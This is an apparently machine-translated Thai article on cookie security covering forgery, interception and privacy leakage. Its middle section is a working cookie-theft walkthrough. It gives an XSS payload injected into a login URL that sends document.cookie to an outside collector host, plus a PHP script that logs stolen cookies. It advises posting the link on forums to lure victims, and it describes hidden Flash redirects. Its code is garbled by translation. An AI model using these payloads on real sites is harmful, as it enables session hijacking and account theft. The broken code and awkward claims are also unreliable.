วัตถุประสงค์ของคุกกี้คือเพื่อนำความสะดวกสบายให้กับผู้ใช้และเพิ่มมูลค่าให้กับเว็บไซต์และโดยทั่วไปจะไม่เป็นภัยคุกคามความปลอดภัยที่ร้ายแรง ไฟล์คุกกี้ไม่สามารถเรียกใช้เป็นรหัสและไม่ส่งไวรัสมันเป็นกรรมสิทธิ์ของผู้ใช้และสามารถอ่านได้โดยเซิร์ฟเวอร์ที่สร้างขึ้น นอกจากนี้เบราว์เซอร์โดยทั่วไปอนุญาตให้จัดเก็บคุกกี้ 300 ตัวเท่านั้นแต่ละไซต์จะเก็บคุกกี้ได้มากถึง 20 คุกกี้และขนาดของคุกกี้แต่ละตัวจะ จำกัด อยู่ที่ 4KB ดังนั้นคุกกี้จะไม่เติมฮาร์ดไดรฟ์และจะไม่ถูกใช้เป็นวิธีการโจมตี "ปฏิเสธการบริการ"
อย่างไรก็ตามเพื่อทดแทนตัวตนของผู้ใช้บางครั้งความปลอดภัยของมันจะกำหนดความปลอดภัยของระบบทั้งหมดและความปลอดภัยของคุกกี้ไม่สามารถเพิกเฉยได้
(1) คุกกี้การปลอมแปลงข้อมูลคุกกี้เช่นรหัสบัญชีของผู้ใช้รหัสผ่าน ฯลฯ และมักจะเข้ารหัสโดยใช้วิธี MD5 และส่งผ่านอินเทอร์เน็ต ข้อมูลที่เข้ารหัสไม่สามารถเข้าใจได้แม้ว่าบางคนจะถูกดักจับโดยบางคนที่มีแรงจูงใจซ่อนเร้นบนอินเทอร์เน็ต อย่างไรก็ตามปัญหาในขณะนี้คือคนที่สกัดกั้นคุกกี้ไม่จำเป็นต้องรู้ความหมายของสตริงเหล่านี้ ตราบใดที่มีคนส่งคุกกี้ของคนอื่นไปยังเซิร์ฟเวอร์และสามารถผ่านการตรวจสอบได้พวกเขาสามารถเข้าสู่เว็บไซต์ในฐานะเหยื่อ พฤติกรรมนี้เรียกว่าการปลอมแปลงคุกกี้
ผู้ใช้ที่ผิดกฎหมายได้รับคีย์การเข้ารหัสที่สอดคล้องกันผ่านคุกกี้ดังนั้นการเข้าถึงข้อมูลส่วนบุคคลทั้งหมดของผู้ใช้ที่ถูกกฎหมายรวมถึงอีเมลของผู้ใช้และแม้แต่ข้อมูลบัญชีทำให้เกิดอันตรายร้ายแรงต่อข้อมูลส่วนบุคคล
(2) การสกัดกั้นคุกกี้
คุกกี้จะถูกส่งระหว่างเบราว์เซอร์และเซิร์ฟเวอร์ในข้อความธรรมดาและมีการดักจับและใช้ประโยชน์จากผู้อื่นได้อย่างง่ายดาย คุกกี้สามารถอ่านได้โดยทุกคนที่สามารถสกัดกั้นการสื่อสารทางเว็บ
หลังจากที่คุกกี้ถูกสกัดกั้นโดยผู้ใช้ที่ผิดกฎหมายแล้วเล่นซ้ำภายในระยะเวลาที่ถูกต้องผู้ใช้ที่ผิดกฎหมายจะได้รับสิทธิ์และผลประโยชน์ของผู้ใช้ตามกฎหมาย ตัวอย่างเช่นสำหรับการอ่านออนไลน์ผู้ใช้ที่ผิดกฎหมายสามารถเพลิดเพลินกับการอ่านนิตยสารอิเล็กทรอนิกส์ออนไลน์โดยไม่ต้องจ่ายค่าธรรมเนียม
มี วิธีการบางอย่างสำหรับการสกัดกั้นคุกกี้ :
(1) ใช้วิธีการเขียนโปรแกรมเพื่อสกัดกั้นคุกกี้ ต่อไปนี้คือการวิเคราะห์วิธีการซึ่งเสร็จสิ้นในสองขั้นตอน
ขั้นตอนที่ 1: วางตำแหน่งเว็บไซต์ที่ต้องการรวบรวมคุกกี้วิเคราะห์และสร้าง URL ก่อนอื่นให้เปิดเว็บไซต์เพื่อรวบรวมคุกกี้ ที่นี่สมมติว่าเป็น http://www.xxx.net, เข้าสู่เว็บไซต์และป้อนชื่อผู้ใช้ "<al>" (ไม่รวมเครื่องหมายคำพูด) วิเคราะห์ข้อมูลและคว้าแพ็กเก็ตและรับรหัสต่อไปนี้:
http://www.xxx.net/txl/login/login.pl? ชื่อผู้ใช้ = <al> & passwd = & ok.x = 28 & ok.y = 6;
แทนที่ "<al>" ด้วย:
"<script> Alert (document.cookie) </script>" ลองอีกครั้งและหากการดำเนินการสำเร็จให้เริ่มสร้าง URL:
http://www.xxx.net/txl/login/login.pl? ชื่อผู้ใช้ = <script> window.open ("http://www.cbifamily.org/cbi.php?"%2bdocument.cookie)</script>&ubpasswd=&ok.x=28&ok.y=6
ในหมู่พวกเขา http://www.cbifamily.org/cbi.php เป็นสคริปต์บนโฮสต์ที่ผู้ใช้สามารถควบคุมได้ ควรสังเกตว่า "%2b" คือการเข้ารหัส URL ของสัญลักษณ์ "+" เพราะ "+" จะถูกประมวลผลเป็นพื้นที่ URL นี้สามารถเผยแพร่ในฟอรัมเพื่อชักจูงผู้อื่นให้คลิก
ขั้นตอนที่ 2: เตรียมสคริปต์ PHP เพื่อรวบรวมคุกกี้และวางไว้บนเว็บไซต์ที่ผู้ใช้สามารถควบคุมได้ เมื่อบุคคลที่ไม่รู้จักคลิกบน URL ที่สร้างขึ้นรหัส PHP สามารถดำเนินการได้ เนื้อหาเฉพาะของสคริปต์นี้มีดังนี้:
การคัดลอกรหัสมีดังนี้:
<? php
$ info = getenv ("ouery_string");
ถ้า ($ ข้อมูล) {
$ fp = fopen ("info.txt", "a");
fwrite ($ fp ,! info. "/n");
fclose ($ fp);
-
ส่วนหัว ("ตำแหน่ง: http: //www.xxx.net");
-
การวางรหัสนี้บนเครือข่ายสามารถรวบรวมคุกกี้ของทุกคนได้ หากฟอรัมอนุญาตให้ใช้รหัส HTML หรือแท็กแฟลชคุณสามารถใช้เทคโนโลยีเหล่านี้เพื่อรวบรวมคุกกี้และวางไว้ในฟอรัมจากนั้นให้โพสต์หัวข้อที่น่าสนใจและเขียนเนื้อหาที่น่าสนใจและรวบรวมคุกกี้จำนวนมากอย่างรวดเร็ว ในฟอรัมรหัสผ่านของคนจำนวนมากถูกขโมยโดยวิธีนี้
(2) ใช้รหัสที่ซ่อนอยู่ของแฟลชเพื่อสกัดกั้นคุกกี้ มีฟังก์ชั่น geturl () ในแฟลช Flash สามารถใช้ฟังก์ชั่นนี้เพื่อเปิดหน้าเว็บที่ระบุโดยอัตโนมัติซึ่งอาจนำผู้ใช้ไปยังเว็บไซต์ที่มีรหัสที่เป็นอันตราย ตัวอย่างเช่นเมื่อผู้ใช้สนุกกับแอนิเมชั่นแฟลชบนคอมพิวเตอร์รหัสในกรอบภาพเคลื่อนไหวอาจเชื่อมต่อกับอินเทอร์เน็ตอย่างเงียบ ๆ และเปิดหน้าเล็ก ๆ ที่มีรหัสพิเศษที่สามารถรวบรวมคุกกี้และทำสิ่งที่เป็นอันตรายอื่น ๆ เว็บไซต์ไม่สามารถห้ามการกระทำของแฟลชนี้ได้เนื่องจากเป็นฟังก์ชั่นภายในของไฟล์แฟลช
(3) ความเป็นส่วนตัวของเครือข่ายการรั่วไหลของคุกกี้
เหตุผลหลักที่ทำให้คุกกี้นำไปสู่การรั่วไหลของความเป็นส่วนตัวออนไลน์คือ:! ขับเคลื่อนด้วยความสนใจในเชิงพาณิชย์ ด้วยการเพิ่มขึ้นของอีคอมเมิร์ซและการเกิดขึ้นของโอกาสทางธุรกิจขนาดใหญ่บนอินเทอร์เน็ตเว็บไซต์และสถาบันบางแห่งใช้คุกกี้และใช้เทคโนโลยีเครื่องมือค้นหาเทคโนโลยีการขุดข้อมูลและแม้แต่เทคโนโลยีการหลอกลวงออนไลน์เพื่อรวบรวมข้อมูลส่วนบุคคลของผู้อื่นโดยไม่ได้รับอนุญาตจากผู้เข้าชม "การเปิดกว้างของการส่งข้อมูลคุกกี้ไฟล์คุกกี้มีกระบวนการจัดส่งพิเศษและลักษณะข้อความไฟล์คุกกี้ที่ไม่ได้เข้ารหัสอย่างปลอดภัยจะถูกส่งระหว่างเซิร์ฟเวอร์และไคลเอนต์ซึ่งสามารถนำไปสู่การรั่วไหลของข้อมูลส่วนบุคคลได้อย่างง่ายดาย
ข้างต้นล้วนเป็นความเข้าใจส่วนบุคคลเกี่ยวกับความปลอดภัยของคุกกี้ หากมีการละเว้นใด ๆ โปรดแก้ไข